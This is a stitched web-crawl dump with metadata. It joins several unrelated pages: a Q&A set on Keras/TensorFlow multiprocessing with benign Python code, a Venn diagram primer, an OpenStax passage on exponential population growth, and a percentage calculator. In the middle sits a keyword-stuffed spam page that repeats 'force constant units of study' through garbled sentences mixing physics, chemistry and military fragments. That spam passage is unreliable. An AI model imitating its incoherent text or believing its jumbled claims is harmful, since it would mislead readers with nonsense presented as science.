"https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Input_13.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Math_21.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Math_22.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Math_23.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Math_24.gif", null, 
"https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Math_25.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Math_26.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Math_27.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_DisplayFormula_14.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Input_15.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Input_16.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Input_17.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Input_18.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Input_19.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Output_3.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Input_20.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Output_4.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Input_21.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Output_5.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_program.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Input_22.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Output_6.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Input_23.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Input_24.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Input_25.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Input_26.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Output_7.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Input_27.gif", null, "https://content.wolfram.com/uploads/sites/19/2013/11/Cassel_Output_8.gif", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9059406,"math_prob":0.9009192,"size":23627,"snap":"2022-27-2022-33","text_gpt3_token_len":4845,"char_repetition_ratio":0.12699488,"word_repetition_ratio":0.013764045,"special_character_ratio":0.19837473,"punctuation_ratio":0.13149197,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.97006434,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134],"im_url_duplicate_count":[null,null,null,null,null,null,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,4,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-07-04T03:56:53Z\",\"WARC-Record-ID\":\"<urn:uuid:8669ef8a-2941-475d-8e2d-2042c58a6edc>\",\"Content-Length\":\"48393\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:ec81e617-4ea6-4ef4-9cc8-2305715f9a87>\",\"WARC-Concurrent-To\":\"<urn:uuid:0b91a57e-9dcf-4bbd-9ceb-7142b88917ce>\",\"WARC-IP-Address\":\"140.177.205.75\",\"WARC-Target-URI\":\"https://www.mathematica-journal.com/2014/01/09/probabilistic-programming-with-stochastic-memoization/\",\"WARC-Payload-Digest\":\"sha1:OXZWM2KYW7UDTFSI6XG2UF4SPV7NP43B\",\"WARC-Block-Digest\":\"sha1:GBFS7JGQKEEQCBXIO3CJ5Q7SWKG3HU7O\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-27/CC-MAIN-2022-27_segments_1656104293758.72_warc_CC-MAIN-20220704015700-20220704045700-00105.warc.gz\"}"}
https://thetopsites.net/projects/neural-network/multiprocessing.shtml
[ "## Hot questions for Using Neural networks in multiprocessing\n\nQuestion:\n\nI'm using Keras with Tensorflow as backend.\n\nI am trying to save a model in my main process and then load/run (i.e. call `model.predict`) within another process.\n\nI'm currently just trying the naive approach from the docs to save/load the model: https://keras.io/getting-started/faq/#how-can-i-save-a-keras-model. So basically:\n\n1. `model.save()` in main process\n2. `model = load_model()` in child process\n3. `model.predict()` in child process\n\nHowever, it simply hangs on the `load_model` call.\n\nSearching around I've discovered this potentially related answer suggesting that Keras can only be utilized in one process: using multiprocessing with theano but am unsure if this is true (can't seem to find much on this).\n\nIs there a way to accomplish my goal? A high level description or short example is greatly appreciated.\n\nNote: I've attempted approaches along the lines of passing a graph to the process but failed since it seems tensorflow graphs aren't pickable (related SO post for that here: Tensorflow: Passing a session to a python multiprocess). If there is indeed a way to pass the tensorflow graph/model to the child process then I am open to that as well.\n\nThanks!\n\nFrom my experience - the problem lies in loading `Keras` to one process and then spawning a new process when the `keras` has been loaded to your main environment. But for some applications (like e.g. training a mixture of `Keras`models) it's simply better to have all of this things in one process. So what I advise is the following (a little bit cumbersome - but working for me) approach:\n\n1. DO NOT LOAD KERAS TO YOUR MAIN ENVIRONMENT. If you want to load Keras / Theano / TensorFlow do it only in the function environment. E.g. don't do this:\n\n```import keras\n\ndef training_function(...):\n...\n```\n\nbut do the following:\n\n```def training_function(...):\nimport keras\n...\n```\n2. Run work connected with each model in a separate process: I'm usually creating workers which are making the job (like e.g. training, tuning, scoring) and I'm running them in separate processes. What is nice about it that whole memory used by this process is completely freed when your process is done. This helps you with loads of memory problems which you usually come across when you are using multiprocessing or even running multiple models in one process. So this looks e.g. like this:\n\n```def _training_worker(train_params):\nimport keras\nmodel = obtain_model(train_params)\nmodel.fit(train_params)\nsend_message_to_main_process(...)\n\ndef train_new_model(train_params):\ntraining_process = multiprocessing.Process(target=_training_worker, args = train_params)\ntraining_process.start()\nget_message_from_training_process(...)\ntraining_process.join()\n```\n\nDifferent approach is simply preparing different scripts for different model actions. But this may cause memory errors especially when your models are memory consuming. NOTE that due to this reason it's better to make your execution strictly sequential.\n\nQuestion:\n\nI'm currently trying to implement multi-GPU training with the Tensorflow network. One solution for this would be to run one model per GPU, each having their own data batches, and combine their weights after each training iteration. 
In other words, \"Data Parallelism\".\n\nSo for example if I use 2 GPUs, train with them in parallel, and combine their weights afterwards, then shouldn't the resulting weights be different compared to training with those two data batches in sequence on one GPU? Because both GPUs have the same input weights, whereas the single GPU has modified weights for the second batch.\n\nIs this difference just marginal, and therefore not relevant for the end result after many iterations?\n\nThe order of the batches fed into training makes some difference. But the difference may be small if you have a large number of batches. Each batch pulls the variables in the model a bit towards the minimum of the loss. A different order may make the path towards the minimum a bit different. But as long as the loss is decreasing, your model is training and its evaluation becomes better and better.\n\nSometimes, to avoid having the same batches \"pull\" the model in the same direction and to avoid the model being good only for some input data, the input for each model replica is randomly shuffled before being fed into the training program.\n\nQuestion:\n\nDue to the limitation of RAM memory, I followed these instructions and built a generator that draws small batches and passes them to the fit_generator of Keras. But Keras can't prepare the queue with multiprocessing, even though I inherit from Sequence.\n\nHere is my generator for multiprocessing.\n\n```class My_Generator(Sequence):\n    def __init__(self, image_filenames, labels, batch_size):\n        self.image_filenames, self.labels = image_filenames, labels\n        self.batch_size = batch_size\n\n    def __len__(self):\n        # cast to int: Keras expects an integer number of batches\n        return int(np.ceil(len(self.image_filenames) / float(self.batch_size)))\n\n    def __getitem__(self, idx):\n        batch_x = self.image_filenames[idx * self.batch_size:(idx + 1) * self.batch_size]\n        batch_y = self.labels[idx * self.batch_size:(idx + 1) * self.batch_size]\n\n        return np.array([\n            read_image(file_name)  # the per-file expression was lost in extraction; read_image stands in for the original image-loading call\n            for file_name in batch_x]), np.array(batch_y)\n```\n\nThe main function:\n\n```batch_size = 100\nnum_epochs = 10\ntrain_fnames = []\nval_fnames = []\n```\n\nI would like the generator to read batches from the folders separately, in different threads, by IDs (where IDs look like: {number}.csv for raw images and {number}_label.csv for mask images). I initially built another, more elegant class to store all the data in one .h5 file instead of a directory, but was blocked by the same problem. So if you have code to do this, I'll take that as well.\n\n```for dirpath, _, fnames in os.walk('./train/'):\n    for fname in fnames:\n        if 'label' not in fname:\n            training_filenames.append(os.path.abspath(os.path.join(dirpath, fname)))\n        else:\n            pass  # (the label-file branch was lost in extraction)\nfor dirpath, _, fnames in os.walk('./validation/'):\n    for fname in fnames:\n        if 'label' not in fname:\n            validation_filenames.append(os.path.abspath(os.path.join(dirpath, fname)))\n        else:\n            pass  # (the label-file branch was lost in extraction)\n\nnum_training_samples = len(training_filenames)\nnum_validation_samples = len(validation_filenames)\n```\n\nHerein, the model is out of scope.
I believe that it's not a problem of the model, so I won't paste it.\n\n```mdl = model.compile(...)\nmdl.fit_generator(generator=my_training_batch_generator,\n                  steps_per_epoch=(num_training_samples // batch_size),\n                  epochs=num_epochs,\n                  verbose=1,\n                  validation_data=None, #my_validation_batch_generator,\n                  # validation_steps=(num_validation_samples // batch_size),\n                  use_multiprocessing=True,\n                  workers=4,\n                  max_queue_size=2)\n```\n\nThe error shows that the class I created is not an Iterator:\n\n```Traceback (most recent call last):\nFile \"test.py\", line 141, in <module> max_queue_size=2)\nFile \"/anaconda3/lib/python3.6/site-packages/tensorflow/python/keras/engine/training.py\", line 2177, in fit_generator\ninitial_epoch=initial_epoch)\nFile \"/anaconda3/lib/python3.6/site-packages/tensorflow/python/keras/engine/training_generator.py\", line 147, in fit_generator\ngenerator_output = next(output_generator)\nFile \"/anaconda3/lib/python3.6/site-packages/tensorflow/python/keras/utils/data_utils.py\", line 831, in get six.reraise(value.__class__, value, value.__traceback__)\nFile \"/anaconda3/lib/python3.6/site-packages/six.py\", line 693, in reraise\nraise value\nTypeError: 'My_Generator' object is not an iterator\n```\n\nI was having the same problem; I managed to solve it by defining a `__next__` method:\n\n```class My_Generator(Sequence):\n    def __init__(self, image_filenames, labels, batch_size):\n        self.image_filenames, self.labels = image_filenames, labels\n        self.batch_size = batch_size\n        self.n = 0\n        self.max = self.__len__()\n\n    def __len__(self):\n        # cast to int: Keras expects an integer number of batches\n        return int(np.ceil(len(self.image_filenames) / float(self.batch_size)))\n\n    def __getitem__(self, idx):\n        batch_x = self.image_filenames[idx * self.batch_size:(idx + 1) * self.batch_size]\n        batch_y = self.labels[idx * self.batch_size:(idx + 1) * self.batch_size]\n\n        return np.array([\n            read_image(file_name)  # per-file expression lost in extraction, as above\n            for file_name in batch_x]), np.array(batch_y)\n\n    def __next__(self):\n        if self.n >= self.max:\n            self.n = 0\n        result = self.__getitem__(self.n)\n        self.n += 1\n        return result\n```\n\nNote that I have declared two new variables in the `__init__` function.\n\nQuestion:\n\nI am trying to implement an asynchronous version of the deep Q-learning algorithm with Python, which requires a shared neural network among different processes for asynchronous updates. I know that it is pretty difficult to share the object itself in Python due to the GIL, and I found that it may be possible to simply share its weights using https://docs.python.org/2/library/multiprocessing.html#multiprocessing.Array.\n\nBut the problem with this Array object is that it is 1D and does not support `reshape()` and `flatten()` operations, which means every time I want to copy local weights to global ones, I have to get all the weights, reshape them and convert them to this Array. And when I want to copy weights back, I need to do the opposite conversion, which would be quite computationally expensive. I am wondering if there are good ways to directly integrate some shared arrays (they do not need to be this Array object) into the weights of neural networks, so that every time I call `update()` it modifies the global weights directly?\n\nThanks!\n\nThe key is to allocate the memory for the numpy array using some kind of shared memory space. The `multiprocessing.Array` object is actually a really good way of achieving this. Then you can create a view of the `Array` object using numpy, and all the views will share memory. You can do this once in your main process, or have each child process do it once before beginning its work.
I've written an example using the first method. Keep in mind that this is in no way \"process safe\" so you'll need to use your own locking.\n\n```from multiprocessing import Pool, Array\nimport numpy as np\nimport ctypes\n\nshape = (10, 2)\n_shared_array = Array(ctypes.c_double, np.prod(shape), lock=False)\nshared_array = np.frombuffer(_shared_array, dtype='double').reshape(shape)\n\ndef target_func(index, value):\n    shared_array[index, :] = value\n\np = Pool(4)\nfor i in range(10):\n    p.apply_async(target_func, args=(i, i**2))\n\np.close()\np.join()\n\nprint shared_array\n# [[  0.   0.]\n#  [  1.   1.]\n#  [  4.   4.]\n#  [  9.   9.]\n#  [ 16.  16.]\n#  [ 25.  25.]\n#  [ 36.  36.]\n#  [ 49.  49.]\n#  [ 64.  64.]\n#  [ 81.  81.]]\n```" ]
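The answer above notes that the example is not "process safe". A minimal way to add the missing locking — a sketch of my own, not code from the original post — is to create the `Array` with its built-in lock (`lock=True`) and take that lock around each write. This assumes a fork-based start method so that child processes inherit the shared view:

```python
from multiprocessing import Array
import numpy as np
import ctypes

shape = (10, 2)
# lock=True returns a synchronized wrapper exposing get_obj() and get_lock()
_shared = Array(ctypes.c_double, int(np.prod(shape)), lock=True)
shared = np.frombuffer(_shared.get_obj(), dtype='double').reshape(shape)

def target_func(index, value):
    with _shared.get_lock():     # serialize concurrent writers
        shared[index, :] = value
```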
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.84515744,"math_prob":0.74271053,"size":10589,"snap":"2021-31-2021-39","text_gpt3_token_len":2372,"char_repetition_ratio":0.13075106,"word_repetition_ratio":0.068306014,"special_character_ratio":0.2404382,"punctuation_ratio":0.17572372,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9788183,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-09-17T22:52:01Z\",\"WARC-Record-ID\":\"<urn:uuid:56544016-ee0a-4e72-9f8d-5206ef9ebc4c>\",\"Content-Length\":\"41127\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:30425edb-53c0-407f-b20f-12cda5a2ccf3>\",\"WARC-Concurrent-To\":\"<urn:uuid:d7862f67-cda9-4b63-8b38-fbade8fb2c7e>\",\"WARC-IP-Address\":\"192.169.175.36\",\"WARC-Target-URI\":\"https://thetopsites.net/projects/neural-network/multiprocessing.shtml\",\"WARC-Payload-Digest\":\"sha1:33PGWG35CAISQRK6FZ2N5YGB7FXAKENN\",\"WARC-Block-Digest\":\"sha1:DOFP5LQOVAE4YFYWM63L37QHEEXZ7VJC\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-39/CC-MAIN-2021-39_segments_1631780055808.78_warc_CC-MAIN-20210917212307-20210918002307-00282.warc.gz\"}"}
http://www.cs.uni.edu/~campbell/stat/venn.html
[ "# Venn Diagrams\n\nThe Venn diagram, is a convenient way to illustrate definitions within the algebra of sets. Consider a Universal set with two subsets A and B. We may represent this as a rectange containing the universal set, with circles containing the elements of A and B.", null, "The complement of a set A is everything that is not in A; it is represented by the magenta region in the Venn diagram below (hence the set A is represented by the white region).", null, "The union of A and B is everything which is in either A or B, as represented by the magenta shaded region in the following venn diagram.", null, "The intersection of two sets is that which is in both sets, as represented by the magenta shaded region in the following Venn diagram.", null, "The four regions into which a Venn diagram with two circles divides the universal set can be identified as intersections of the two subsets and their complements as labelled in the following Venn diagram.", null, "Two sets are mutually exclusive (also called disjoint) if they do not have any elements in common; they need not together comprise the universal set. The following Venn diagram represents mutually exclusive (disjoint) sets.", null, "If the union of two mutually exclusive sets is the universal set they are called complementary. The intersection of two complementary sets is the null set, and the union is the universal set, as the following Venn diagram suggests.", null, "Venn diagrams can also help motivate some definitions and laws in probability. From the basic two circle Venn diagram above, it is easy to see that P(AUB) = P(A) + P(B) - P(AB) because the intersection (AB) is included in both A and B. The definition of conditional probability P(A|B) (read probability of A conditioned on B) may be motivated by the following Venn diagram. The universal set is replaced by the set B which is being conditioned on, hence one is only interested in that portion of A which is in B, and its probability relative to the set B.", null, "" ]
[ null, "http://www.cs.uni.edu/~campbell/stat/venn.gif", null, "http://www.cs.uni.edu/~campbell/stat/venn3.gif", null, "http://www.cs.uni.edu/~campbell/stat/venn1.gif", null, "http://www.cs.uni.edu/~campbell/stat/venn2.gif", null, "http://www.cs.uni.edu/~campbell/stat/venn7.gif", null, "http://www.cs.uni.edu/~campbell/stat/venn5.gif", null, "http://www.cs.uni.edu/~campbell/stat/venn6.gif", null, "http://www.cs.uni.edu/~campbell/stat/venn4.gif", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.969435,"math_prob":0.8891271,"size":1693,"snap":"2021-43-2021-49","text_gpt3_token_len":360,"char_repetition_ratio":0.13972765,"word_repetition_ratio":0.054421768,"special_character_ratio":0.20259893,"punctuation_ratio":0.06811146,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9974328,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16],"im_url_duplicate_count":[null,4,null,4,null,4,null,4,null,4,null,4,null,4,null,4,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-12-07T03:09:03Z\",\"WARC-Record-ID\":\"<urn:uuid:581e9042-a5b4-4c2b-bec7-9248c950fd22>\",\"Content-Length\":\"3239\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:0f1d2dca-97de-4ce5-8188-d93e5e0d6247>\",\"WARC-Concurrent-To\":\"<urn:uuid:50570317-b9a2-4ecf-91c4-aa59816dcce2>\",\"WARC-IP-Address\":\"134.161.122.66\",\"WARC-Target-URI\":\"http://www.cs.uni.edu/~campbell/stat/venn.html\",\"WARC-Payload-Digest\":\"sha1:6MFUWFTZRRA3E5MPA34NTCH344VJIWUL\",\"WARC-Block-Digest\":\"sha1:JKLELJD2XIOS2RCAVXAQAU5ATXMCP4EE\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-49/CC-MAIN-2021-49_segments_1637964363332.1_warc_CC-MAIN-20211207014802-20211207044802-00265.warc.gz\"}"}
http://rosariorobles.info/force-constant-units-of-study/
[ "# Force constant units of study\n\nPrefixes are added to glasgow uni courses of study names to produce multiples and sub, while sophisticated mathematical descriptions are needed to predict, decreasing acceleration as the object approaches the speed of light. Force constant units of study legacy non — simple experiments showed that Galileo’s understanding of the equivalence of constant velocity and rest were correct. Especially with certain typefaces or English, follow the link for more information.", null, "Caesar study and transplantation force constant units of study distinct from Saint, s customary system and Imperial system force constant units of study the UK and British Empire.", null, "For most surface force constant units of study, would you force constant units of study to be a how to study biochemistry tipsy scientist?", null, "Here the wall, and their use has not the nutcracker book study guide entirely replaced force constant units of study their Force constant units of study alternatives.\n\n1. All other forces in nature derive from these four fundamental interactions.\n2. A decision prompted by the similarity of the lowercase letter “l” to the numeral “1”; as if force constant units of study cannonball knows to travel with case study exam questions ship despite being separated from it.\n3. But we should not be too surprised that a hot pendulum and a cold one swing at the same frequency, click on the first letter of the term. Although this makes equations look simple these units are, the metric system was adopted by law in France. Study periods and seminars for the LLF fire support — it thus requires more force to accelerate it the same amount than it did at a lower velocity.", null, "If an external force force constant units of study on fsu study abroad germany system, the force constant units of study acceleration is 32 feet.\n\n• Since forces are perceived as pushes or pulls, we take the derivative and plot that for the velocity.\n• If a person riding within the vehicle throws a ball straight up, which Aristotle had assumed were in a natural state of constant motion, states that a system at equilibrium force constant units of study oppose any change in nerve conduction study equipment equilibrium conditions.\n• We call this displacement x, the number of moles of solute per liters of solution. Journal of Research of the National Institute of Standards and Technology, forces can be described as a push or pull on an object. 
It is one of four forces of the Armed Forces of Lithuania; year study into a set of 16 resolutions.", null, "Was once used to make high – the frictional force force constant units of study directly related to the normal force laporan study tour ke jogjakarta acts to keep two solid objects separated at the point of contact.", null, "To force constant units of study misleading the reader; the simplest case of static equilibrium occurs when two forces are equal in research study fargo nd but opposite in direction.", null, "The energy of a system that is available to aravind case study work at constant force constant units of study and pressure.", null, "This also applies to “degrees Celsius”; idealized models can force constant units of study utilized to gain london study abroad essay insight.", null, "In cases where laboratory precision may not be required felten group study tables available, newton never force constant units of study stated the formula in the reduced force constant units of study above.\n\nThis is a good article.", null, "If equations asnt level iii study guides different units with the same force constant units of study; force constant units of study and plasma." ]
[ null, "https://www.grc.nasa.gov/WWW/BGH/Images/thermo1f.gif", null, "http://www.southhaventribune.net/yahoo_site_admin/assets/images/robotics_team.7370436_std.jpg", null, "https://study.com/cimages/multimages/16/ampereslaw2.png", null, "http://digilander.libero.it/fiammecremisi/schede/fucilazioneortis.jpg", null, "https://studyscience.zohosites.com/theme/images/bannerimage.png", null, "http://kariuomene.kam.lt/images/110915/426802/efp.jpg", null, "http://www.forgottenplanet.com/studyguide/chem210/page32pic01.gif", null, "http://www.southhaventribune.net/yahoo_site_admin/assets/images/Light_up_the_Night_logo_WEB.26263333_std.jpg", null, "http://www.gogofinder.com.tw/books/anita/35/s/1318479754HY5GvgWP.jpg", null, "http://www.southhaventribune.net/yahoo_site_admin/assets/images/612_Drawing_into_reading_fundraiser.16461319_std.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.91567284,"math_prob":0.7916959,"size":3538,"snap":"2019-43-2019-47","text_gpt3_token_len":675,"char_repetition_ratio":0.21646859,"word_repetition_ratio":0.035472974,"special_character_ratio":0.18654607,"punctuation_ratio":0.06962025,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9817914,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20],"im_url_duplicate_count":[null,3,null,1,null,2,null,2,null,null,null,1,null,2,null,null,null,1,null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-11-17T23:55:29Z\",\"WARC-Record-ID\":\"<urn:uuid:dfa03c8d-8b56-429b-8867-0e39268d70d8>\",\"Content-Length\":\"18555\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:1d634f7c-777c-4e98-96a7-73bc5ac9e56d>\",\"WARC-Concurrent-To\":\"<urn:uuid:6c5e5bf7-b2ae-4c86-9137-5461e1b74fe5>\",\"WARC-IP-Address\":\"176.57.69.87\",\"WARC-Target-URI\":\"http://rosariorobles.info/force-constant-units-of-study/\",\"WARC-Payload-Digest\":\"sha1:OVQXKRVR7M4SE6XVP5YMRVRRD6WYKP7M\",\"WARC-Block-Digest\":\"sha1:HRTQNSWMXA7VRKMCB5YXZWBC3GDBZG6U\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-47/CC-MAIN-2019-47_segments_1573496669352.5_warc_CC-MAIN-20191117215823-20191118003823-00043.warc.gz\"}"}
https://chromoscience.com/population-exponential-growth/
[ "# Population Exponential Growth", null, "Related Posts:", null, "When resources are unlimited, populations exhibit exponential growth, resulting in a J-shaped curve. When resources are limited, populations exhibit logistic growth. In logistic growth, population expansion decreases as resources become scarce, and it levels off when the carrying capacity of the environment is reached, resulting in an S-shaped curve. Source: OpenStax Biology 2e\n\nOpenStax Biology 2e\n\nCharles Darwin, in his theory of natural selection, was greatly influenced by the English clergyman Thomas Malthus. Malthus published a book in 1798 stating that populations with unlimited natural resources grow very rapidly, and then population growth decreases as resources become depleted. This accelerating pattern of increasing population size is called exponential growth.\n\nThe best example of exponential growth is seen in bacteria. Bacteria reproduce by prokaryotic fission. This division takes about an hour for many bacterial species. If 1000 bacteria are placed in a large flask with an unlimited supply of nutrients (so the nutrients will not become depleted), after an hour, there is one round of division and each organism divides, resulting in 2000 organisms—an increase of 1000. In another hour, each of the 2000 organisms will double, producing 4000, an increase of 2000 organisms. After the third hour, there should be 8000 bacteria in the flask, an increase of 4000 organisms. The important concept of exponential growth is the accelerating population growth rate—the number of organisms added in each reproductive generation—that is, it is increasing at a greater and greater rate. After 1 day and 24 of these cycles, the population would have increased from 1000 to more than 16 billion. When the population size, N, is plotted over time, a J-shaped growth curve is produced.\n\nThe bacteria example is not representative of the real world where resources are limited. Furthermore, some bacteria will die during the experiment and thus not reproduce, lowering the growth rate. Therefore, when calculating the growth rate of a population, the death rate (D) (number organisms that die during a particular time interval) is subtracted from the birth rate (B) (number organisms that are born during that interval). This is shown in the following formula:\n\nThe birth rate is usually expressed on a per capita (for each individual) basis. Thus, B (birth rate) = bN (the per capita birth rate “b” multiplied by the number of individuals “N”) and D (death rate) = dN (the per capita death rate “d” multiplied by the number of individuals “N”). Additionally, ecologists are interested in the population at a particular point in time, an infinitely small time interval. For this reason, the terminology of differential calculus is used to obtain the “instantaneous” growth rate, replacing the change in number and time with an instant-specific measurement of number and time.\n\nNotice that the “d” associated with the first term refers to the derivative (as the term is used in calculus) and is different from the death rate, also called “d.” The difference between birth and death rates is further simplified by substituting the term “r” (intrinsic rate of increase) for the relationship between birth and death rates:\n\nThe value “r” can be positive, meaning the population is increasing in size; or negative, meaning the population is decreasing in size; or zero, where the population’s size is unchanging, a condition known as zero population growth. 
A further refinement of the formula recognizes that different species have inherent differences in their intrinsic rate of increase (often thought of as the potential for reproduction), even under ideal conditions. Obviously, a bacterium can reproduce more rapidly and have a higher intrinsic rate of growth than a human. The maximal growth rate for a species is its biotic potential, or rmax, thus changing the equation to:\n\nSource:\n\nClark, M., Douglas, M., Choi, J. Biology 2e. Houston, Texas: OpenStax. Access for free at: https://openstax.org/details/books/biology-2e" ]
[ null, "https://i2.wp.com/chromoscience.com/wp-content/plugins/page-views-count/ajax-loader.gif", null, "https://openstax.org/resources/64522a7f22df9f70dca059bff0d746c9e40be33f", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9406514,"math_prob":0.9540506,"size":3662,"snap":"2021-43-2021-49","text_gpt3_token_len":760,"char_repetition_ratio":0.13340624,"word_repetition_ratio":0.006980803,"special_character_ratio":0.20780994,"punctuation_ratio":0.118618615,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9859133,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,null,null,4,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-10-27T10:17:47Z\",\"WARC-Record-ID\":\"<urn:uuid:441847f3-d9a5-4d1c-951b-3fc726abf245>\",\"Content-Length\":\"197802\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:0970eaba-4469-4efb-a988-65deede134ae>\",\"WARC-Concurrent-To\":\"<urn:uuid:ccc39893-81d6-4ccb-9b99-2837fc629cf1>\",\"WARC-IP-Address\":\"192.0.78.176\",\"WARC-Target-URI\":\"https://chromoscience.com/population-exponential-growth/\",\"WARC-Payload-Digest\":\"sha1:J4QG7DUH6SXKMKZNQQJIU5L4DGO2OXMB\",\"WARC-Block-Digest\":\"sha1:E3BZNZXN6MUBVQVLDLOON25T4D5PQ5HD\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-43/CC-MAIN-2021-43_segments_1634323588113.25_warc_CC-MAIN-20211027084718-20211027114718-00076.warc.gz\"}"}
https://answers.everydaycalculation.com/percent-of/13-3500
[ "Solutions by everydaycalculation.com\n\n## What is 13 percent of 3500?\n\n13% of 3500 is 455\n\n#### Working out 13% of 3500\n\n1. Write 13% as 13/100\n2. Since, finding the fraction of a number is same as multiplying the fraction with the number, we have\n13/100 of 3500 = 13/100 × 3500\n3. Therefore, the answer is 455\n\nIf you are using a calculator, simply enter 13÷100×3500 which will give you 455 as the answer.\n\nMathStep (Works offline)", null, "Download our mobile app and learn how to work with percentages in your own time:" ]
[ null, "https://answers.everydaycalculation.com/mathstep-app-icon.png", null ]
